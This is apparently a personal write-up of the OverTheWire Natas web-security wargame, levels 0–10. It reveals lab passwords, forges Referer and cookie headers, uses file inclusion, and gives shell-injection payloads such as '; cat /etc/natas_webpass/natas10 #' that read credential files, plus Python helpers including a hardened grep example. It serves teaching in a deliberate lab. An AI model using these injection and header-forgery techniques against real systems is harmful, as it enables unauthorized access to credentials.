OverTheWire.org – Natas

This is my first attempt at an online wargame called ‘Natas’ hosted by overthewire.org. My personal goal in attempting this wargame is to refresh my knowledge of web-application security. I have completed a similar wargame called ‘Bandit’, but that is a simple refresher on Unix/Linux administration, so I will not be documenting anything about it, as there are already plenty of websites covering its solutions.

As mentioned by overthewire.org:

Natas teaches the basics of serverside web-security.

Each level of natas consists of its own website located at http://natasX.natas.labs.overthewire.org, where X is the level number. There is no SSH login. To access a level, enter the username for that level (e.g. natas0 for level 0) and its password.

Each level has access to the password of the next level. Your job is to somehow obtain that next password and level up. All passwords are also stored in /etc/natas_webpass/. E.g. the password for natas5 is stored in the file /etc/natas_webpass/natas5 and only readable by natas4 and natas5.

Start here:

Username: natas0
Password: natas0
URL: http://natas0.natas.labs.overthewire.org

So let's begin!

LEVEL 0

  1. Head over to the URL: http://natas0.natas.labs.overthewire.org.
  2. We are greeted with a page that says ‘You can find the password for the next level on this page’. That’s an obvious hint!
  3. View the source of the page and we are greeted with the password.

<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas0", "pass": "natas0" };</script></head>
<body>
<h1>natas0</h1>
<div id="content">
You can find the password for the next level on this page.

<!--The password for natas1 is gtVrDuiDfck831PqWsLEZy5gyDz1clto --></div>
</body>
</html>

The password is shown on line 16, in an HTML comment.

On to the next level…

LEVEL 1

Username: natas1
URL: http://natas1.natas.labs.overthewire.org

For this level, a JavaScript handler (the oncontextmenu attribute on the body tag) blocks right-clicking. Since I am using the Chrome browser, the CTRL-U shortcut opens the page source directly, which bypasses this and reveals the password:


<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas1", "pass": "gtVrDuiDfck831PqWsLEZy5gyDz1clto" };</script></head>
<body oncontextmenu="javascript:alert('right clicking has been blocked!');return false;">
<h1>natas1</h1>
<div id="content">
You can find the password for the
next level on this page, but rightclicking has been blocked!

<!--The password for natas2 is ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi --></div>
</body>
</html>

On to the next level…

LEVEL 2

http://natas2.natas.labs.overthewire.org/


<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas2", "pass": "ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi" };</script></head>
<body>
<h1>natas2</h1>
<div id="content">
There is nothing on this page
<img src="files/pixel.png">
</div>
</body></html>

Seems like there is nothing much here except for a pixel.png file. I downloaded it and tried to open it in a text viewer, but no go: the file is indeed a PNG. However, notice the directory the ‘pixel.png’ file lives in, which is called ‘files’. If you append that to the URL, http://natas2.natas.labs.overthewire.org/files/, you get an open directory listing (the web server has directory indexing enabled for that path) containing a text file called ‘users.txt’. Open that and the password is in there.

# username:password
alice:BYNdCesZqW
bob:jw2ueICLvT
charlie:G5vCxkVV3m
natas3:sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14
eve:zo4mJWyNj2
mallory:9urtcpzBmH

On to the next level…

LEVEL 3

http://natas3.natas.labs.overthewire.org/


<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas3", "pass": "sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14" };</script></head>
<body>
<h1>natas3</h1>
<div id="content">
There is nothing on this page
<!-- No more information leaks!! Not even Google will find it this time... -->
</div>
</body></html>

The hint here is “Not even Google will find it this time…”. To understand it, read up on the Robots Exclusion Protocol at http://www.robotstxt.org/robotstxt.html: robots.txt tells well-behaved crawlers which paths to stay away from, but it is a public file, so it also tells anyone who reads it exactly which paths the site owner wanted hidden. So append ‘robots.txt’ to the URL: http://natas3.natas.labs.overthewire.org/robots.txt.

User-agent: *
Disallow: /s3cr3t/

Then append the disallowed path to the URL: http://natas3.natas.labs.overthewire.org/s3cr3t/. Open the text file named ‘users.txt’ in that listing and the password is in that file.

natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ

On to the next level…

LEVEL 4

http://natas4.natas.labs.overthewire.org/

For level 4, we get an error message: “Access disallowed. You are visiting from http://natas4.natas.labs.overthewire.org while authorized users should come only from http://natas5.natas.labs.overthewire.org.” The server is using the Referer header as an access check, but that header is set by the client, so it can be whatever we want it to be. There are many ways to do this; depending on preference, you could use one of the browser plugins that edit request headers. For me, I chose to use Burp Suite to intercept the HTTP GET request and add a Referer header:

GET /index.php HTTP/1.1
Host: natas4.natas.labs.overthewire.org
Referer: http://natas5.natas.labs.overthewire.org/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Authorization: Basic bmF0YXM0Olo5dGtSa1dtcHQ5UXI3WHJSNWpXUmtnT1U5MDFzd0Va
Cache-Control: max-age=0

After the page is refreshed, the password will be revealed in a message:

Access granted. The password for natas5 is iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq 

On to the next level…

LEVEL 5

http://natas5.natas.labs.overthewire.org/

Upon accessing the natas5 URL we are immediately greeted with a message: “Access disallowed. You are not logged in”. I checked the source, but nope, no luck there. I then set up Burp Suite again, hit refresh, and intercepted the HTTP GET request:

GET /index.php HTTP/1.1
Host: natas5.natas.labs.overthewire.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Cookie: loggedin=0
Authorization: Basic bmF0YXM1OmlYNklPZm1wTjdBWU9RR1B3dG4zZlhwYmFKVkpjSGZx
Cache-Control: max-age=0

Notice line 10. There is a cookie called ‘loggedin’ which is set to 0. Change the value to 1, forward the request and voilà, the page refreshes with the password shown. Like the Referer header in level 4, a cookie is client-side state: if the server stores “am I logged in?” there without signing it, the client can simply rewrite it:

Access granted. The password for natas6 is aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1
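Both of these requests can be scripted instead of edited by hand in Burp. The following Python is an added example (my own, not from the write-up) using only the standard library: it builds the Basic Authorization header the browser sends for each level, forges the Referer for level 4 and rewrites the cookie for level 5. The passwords are the ones shown on this page; fetch() is the only function that touches the network and is left commented out in the demo.

```python
import base64
import urllib.request
from typing import Dict, Optional

# Passwords as revealed earlier on this page (natas4 and natas5)
NATAS4_PASSWORD = "Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ"
NATAS5_PASSWORD = "iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq"


def basic_auth_header(user: str, password: str) -> str:
    """HTTP Basic is just base64(user:password), not encryption: over the
    plain http:// URLs these levels use, anyone on the path can read it."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return f"Basic {token}"


def decode_basic_auth(header: str) -> str:
    """Recover user:password from an Authorization header captured in Burp."""
    scheme, _, token = header.partition(" ")
    if scheme != "Basic":
        raise ValueError("not a Basic Authorization header")
    return base64.b64decode(token).decode()


def build_request(level: int, password: str, referer: Optional[str] = None,
                  cookies: Optional[Dict[str, str]] = None) -> urllib.request.Request:
    """Build GET /index.php for natas<level> with the headers the server
    trusts but the client controls: Referer (level 4) and Cookie (level 5)."""
    url = f"http://natas{level}.natas.labs.overthewire.org/index.php"
    req = urllib.request.Request(url)
    req.add_header("Authorization", basic_auth_header(f"natas{level}", password))
    if referer is not None:
        req.add_header("Referer", referer)
    if cookies:
        req.add_header("Cookie", "; ".join(f"{k}={v}" for k, v in cookies.items()))
    return req


def fetch(req: urllib.request.Request) -> str:
    """Send the request; this is the only function that talks to the lab."""
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    # Level 4: the server checks Referer, which is whatever we say it is.
    lvl4 = build_request(4, NATAS4_PASSWORD,
                         referer="http://natas5.natas.labs.overthewire.org/")
    # Level 5: the server trusts an unsigned cookie it handed to us, so rewrite it.
    lvl5 = build_request(5, NATAS5_PASSWORD, cookies={"loggedin": "1"})
    for req in (lvl4, lvl5):
        print(req.get_full_url(), req.header_items())
        # print(fetch(req))  # uncomment to actually query the lab
```

decode_basic_auth() is handy when reviewing a captured request: the Authorization lines in the two Burp captures above decode to exactly natas4:&lt;password&gt; and natas5:&lt;password&gt;, which is why these levels should never be done over a network you do not trust.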

On to the next level…

LEVEL 6

http://natas6.natas.labs.overthewire.org/

We are greeted with a screen that has an input box asking for an input secret. Clicking the view source link shows us a php script:

<?

include "includes/secret.inc";   // defines $secret; the include file itself is served as plain text

if(array_key_exists("submit", $_POST)) {
    if($secret == $_POST['secret']) {
        print "Access granted. The password for natas7 is <censored>";
    } else {
        print "Wrong secret";
    }
}
?>

Notice line 3: the secret is pulled in from ‘includes/secret.inc’, and that file sits under the web root where the server hands it out as plain text instead of executing it. Appending “includes/secret.inc” to the URL, http://natas6.natas.labs.overthewire.org/includes/secret.inc, reveals the input secret:

<?
$secret = "FOEIUWGHFEEUHOFUOIU";
?>

Return to the homepage of natas6 and input the secret “FOEIUWGHFEEUHOFUOIU” and the password will be revealed:

Access granted. The password for natas7 is 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9

On to the next level…

LEVEL 7

http://natas7.natas.labs.overthewire.org/

For natas7, it is pretty straightforward. On viewing the page source, we can see an obvious hint:

<!-- hint: password for webuser natas8 is in /etc/natas_webpass/natas8 -->

Going back to the homepage, simply click on any of the links; in my case, I clicked on ‘About’. Notice the URL of the ‘About’ page: http://natas7.natas.labs.overthewire.org/index.php?page=about. The ‘page’ parameter is used as a file path on the server, so changing ‘about’ in the URL to ‘/etc/natas_webpass/natas8’ (a textbook local file inclusion) makes the server include the password file and reveals the password.

DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe

On to the next level…

LEVEL 8

http://natas8.natas.labs.overthewire.org/

Level 8 is similar to level 6. View the source and you will be able to see a php script:

<?

$encodedSecret = "3d3d516343746d4d6d6c315669563362";

function encodeSecret($secret) {
    return bin2hex(strrev(base64_encode($secret)));
}

if(array_key_exists("submit", $_POST)) {
    if(encodeSecret($_POST['secret']) == $encodedSecret) {
        print "Access granted. The password for natas9 is <censored>";
    } else {
        print "Wrong secret";
    }
}
?>

Looking at the script, the secret variable (the input secret we need to put in) is first base64-encoded, the output string is then reversed, and the reversed string is converted to hex with php’s bin2hex(). Every one of those steps is reversible, so the “encoded” secret in the source is the secret itself, just in disguise. I solved this by creating a php snippet that applies the inverse of each step in the opposite order:

$ cat reverse.php
<?
echo base64_decode(strrev(hex2bin("3d3d516343746d4d6d6c315669563362")));
?>

Then run the php command with the -n -f flags (no php.ini, execute the given file) in any shell with php installed. In my case I used Cygwin:

$ php -n -f reverse.php
oubWYf2kBq

The output of the php snippet is ‘oubWYf2kBq’, which is the input secret. Return to the homepage and key that in to reveal the password for natas9:

Access granted. The password for natas9 is W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl
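For comparison, here is the same inversion in Python as an added example (mine, not the write-up’s snippet), with the forward transform alongside so the recovered secret can be checked by re-encoding it. The lesson it makes concrete: base64, strrev and bin2hex are bijections, so storing their output in page source protects nothing; only a real password hash would have stopped this.

```python
import base64
import binascii

# The constant from the level's source
ENCODED_SECRET = "3d3d516343746d4d6d6c315669563362"


def encode_secret(secret: str) -> str:
    """Same pipeline as the level's encodeSecret(): base64 -> reverse -> hex."""
    b64 = base64.b64encode(secret.encode()).decode()
    return binascii.hexlify(b64[::-1].encode()).decode()


def decode_secret(encoded: str) -> str:
    """Undo encode_secret step by step in the opposite order:
    unhex -> reverse -> base64-decode.  Note that base64 padding ('=')
    ends up at the *front* of the reversed string, which is why the
    hex constant starts with 3d3d ('=' is 0x3d)."""
    reversed_b64 = binascii.unhexlify(encoded).decode()
    b64 = reversed_b64[::-1]
    return base64.b64decode(b64).decode()


def recover_and_verify(encoded: str) -> str:
    """Decode, then prove the answer by re-encoding it to the original constant."""
    secret = decode_secret(encoded)
    if encode_secret(secret) != encoded:
        raise ValueError("round trip failed; the transform is not what we assumed")
    return secret


if __name__ == "__main__":
    print(recover_and_verify(ENCODED_SECRET))   # oubWYf2kBq
```

The round-trip check in recover_and_verify() is the habit worth keeping: whenever you invert a custom "encoding" you found in source, re-encode your answer before typing it into the form, so a mistake in your inversion shows up locally rather than as a silent "Wrong secret".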

On to the next level…

LEVEL 9

http://natas9.natas.labs.overthewire.org/

Level 9 is interesting. On viewing the source, we can see a php script:

<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    passthru("grep -i $key dictionary.txt");
}
?>

Looking at the script, the user-supplied needle is concatenated straight into a shell command string and run with php’s passthru() function. This means we can inject shell commands that run on the server as the web user for this level, natas9! So simply inject the command:

; cat /etc/natas_webpass/natas10 #

into the text field and the password for natas10 will be revealed. Why does this work? Take a look at:

passthru("grep -i $key dictionary.txt");

Looking at the code, we know that the $key variable is whatever is keyed into the text field on the page. The ‘;’ at the beginning terminates the grep command, so the shell then runs ‘cat /etc/natas_webpass/natas10’ as a second, separate command. You may ask, why ‘/etc/natas_webpass/natas10’? I inferred from the Bandit wargame and level 5 of Natas that the passwords for all the exercises can be found in the ‘/etc/natas_webpass/’ directory. So you must be thinking: can you simply use this form to get all the other passwords and skip the exercises entirely? NOPE. Each password file is only readable by its own level and the level before it, so natas9 can read natas10 and nothing further. The ‘#’ at the end comments out the trailing ‘dictionary.txt’ so that it is not passed to cat as a second file; without it, cat prints the password followed by the whole dictionary. The ‘#’ is optional, you will still get the password regardless of whether you add it, it just keeps the output clean.

natas10:nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu

On to the next level…

LEVEL 10

http://natas10.natas.labs.overthewire.org/

Level 10 is similar to the previous level, but this time, the php code filters certain characters:

<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    if(preg_match('/[;|&]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i $key dictionary.txt");
    }
}
?>

Notice line 9. The code now rejects ‘;’, ‘|’ and ‘&’, which means we can no longer terminate the ‘grep’ command to run a ‘cat’ command. However, the needle is still pasted unquoted into the command line, so we can still make grep itself read /etc/natas_webpass/natas11: give it a pattern that matches everything and add the password file as an extra file argument!

.* /etc/natas_webpass/natas11 #

The explanation: ‘.*’ is meant as a regular expression that matches every line (see the grep man page), ‘/etc/natas_webpass/natas11’ is tacked on as a second file for grep to search, and the trailing ‘#’ comments out ‘dictionary.txt’ just as in level 9. One caveat worth knowing: because the needle lands in the command line unquoted, the shell also treats ‘.*’ as a filename glob and expands it against the dotfiles in the web root before grep ever runs. That is why ‘.htaccess’ and ‘.htpasswd’ (complete with a password hash for natas10) appear in the output next to the password file, and why every line is prefixed with its file name, as grep does whenever it is given more than one file:

.htaccess:AuthType Basic
.htaccess: AuthName "Authentication required"
.htaccess: AuthUserFile /var/www/natas/natas10//.htpasswd
.htaccess: require valid-user
.htpasswd:natas10:$1$YvNQ2ijE$iO2t49ZDxkCdXUw6cBlkN/
/etc/natas_webpass/natas11:U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK
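To make the difference between levels 9 and 10 concrete, here is an added Python example (mine, not part of either level’s PHP). It re-implements the level-10 denylist, approximates how /bin/sh parses the vulnerable command line for both payloads from this write-up, and shows the hardened alternative: an allowlist plus an argv list handed to subprocess with no shell in between. The allowlist pattern and the constructed dictionary file are my assumptions for the demo; shlex does not model glob expansion, so ‘.*’ stays a literal token here even though the real shell expands it.

```python
import re
import shlex
import subprocess
from typing import List, Optional

# The level-10 denylist exactly as the PHP has it: preg_match('/[;|&]/', $key)
DENYLIST = re.compile(r"[;|&]")
# An allowlist a fixed version would use instead (my choice, not the level's code):
# dictionary words only, nothing the shell or grep could reinterpret.
ALLOWLIST = re.compile(r"[A-Za-z0-9]{1,64}")

# The two payloads from the write-up above
LEVEL9_PAYLOAD = "; cat /etc/natas_webpass/natas10 #"
LEVEL10_PAYLOAD = ".* /etc/natas_webpass/natas11 #"


def blocked_by_denylist(key: str) -> bool:
    """True if the level-10 filter would reject this needle."""
    return DENYLIST.search(key) is not None


def shell_commands(key: str) -> List[List[str]]:
    """Approximate what /bin/sh makes of passthru("grep -i $key dictionary.txt"):
    tokenise, split on ';' into separate commands, and drop everything after '#'.
    Glob expansion ('.*' against dotfiles) is not modelled."""
    lexer = shlex.shlex(f"grep -i {key} dictionary.txt", posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    commands: List[List[str]] = [[]]
    for token in lexer:
        if token == ";":
            commands.append([])
        else:
            commands[-1].append(token)
    return [cmd for cmd in commands if cmd]


def safe_argv(key: str) -> Optional[List[str]]:
    """Hardened builder: allowlist the needle, pass it as one argv element after '--'
    so it can never be read as a grep option, and never go through a shell."""
    if not ALLOWLIST.fullmatch(key):
        return None
    return ["grep", "-i", "--", key, "dictionary.txt"]


def safe_grep(key: str, cwd: str) -> str:
    """Run the hardened command: no shell, so no ';', '#' or glob expansion."""
    argv = safe_argv(key)
    if argv is None:
        return "Input contains an illegal character!"
    result = subprocess.run(argv, cwd=cwd, capture_output=True, text=True)
    return result.stdout


if __name__ == "__main__":
    import os
    import tempfile

    for payload in (LEVEL9_PAYLOAD, LEVEL10_PAYLOAD):
        print(f"{payload!r}: blocked={blocked_by_denylist(payload)} -> {shell_commands(payload)}")
    with tempfile.TemporaryDirectory() as d:      # constructed dictionary for the demo
        with open(os.path.join(d, "dictionary.txt"), "w") as f:
            f.write("apple\nBanana\ncherry\n")
        print(safe_grep("banana", d), end="")      # Banana
        print(safe_grep(LEVEL10_PAYLOAD, d))       # rejected by the allowlist
```

shell_commands() shows why the level-10 filter is no fix: the level-9 payload is blocked, but the level-10 payload passes the denylist and still reaches grep as two extra arguments, a pattern and a file path. Denylisting characters can only chase the last trick you thought of; the hardened builder removes the shell from the picture, so there is no command line to inject into at all.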